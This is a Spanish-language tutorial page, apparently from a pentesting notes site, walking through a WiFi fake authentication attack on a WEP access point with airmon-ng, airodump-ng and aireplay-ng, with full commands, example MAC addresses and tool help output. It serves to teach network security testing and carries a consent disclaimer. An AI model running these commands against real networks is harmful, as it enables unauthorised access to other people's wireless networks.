🌐Fake Autentication

Disclaimer: Vamos a realizar ataques a redes WiFi, por lo que no podemos utilizar estas técnicas sin un consentimiento o aprobación por parte del objetivo

Factores

Este ataque se puede usar cuando:

No hay mucho tráfico en la red víctima
Toma mucho tiempo capturar IVs

Para esto debemos asociarnos con el AP (Access Point) para generar tráfico

1. Apagar adaptador wlan0

ifconfig wlan0 down

2. Iniciamos airmon-ng

sudo airmon-ng start wlan0

3. Encontrar al objetivo

sudo airodump-ng wlan0

4. Iniciar airodump

Debemos guardar la salida con --write

# 4 - Iniciamos airodump-ng y guardamos la salida
sudo airodump-ng --bssid 00:E0:4C:6A:5A:F8 --channel 11 --write fake_auth wlan0

Observamos que hay muy poco tráfico en la red

Importante: mantener abierto mientras se ejecuta aireplay-ng

5. Iniciar aireplay-ng

sudo aireplay-ng --help

Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
  >>  --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --migmode           : attacks WPA migration mode  (-8)
      --test              : tests injection and quality (-9)

sudo aireplay-ng --fakeauth 0 -a <SSID-OBJETIVO> -h <MAC-ADAPTADOR> <INTERFAZ>

sudo aireplay-ng --fakeauth 0 -a 00:E0:AC:6A:5A:F8 -h E8:4E:06:35:A9:C0 wlan0mon

Volviendo a airodump vemos que hemos hecho correctamente el fake auth. No nos ha pedido contraseña para loguearnos y estamos conectados a la red objetivo.

AnteriorAtaque a WEP SiguientePacket Injection

Última actualización hace 2 años

¿Te fue útil?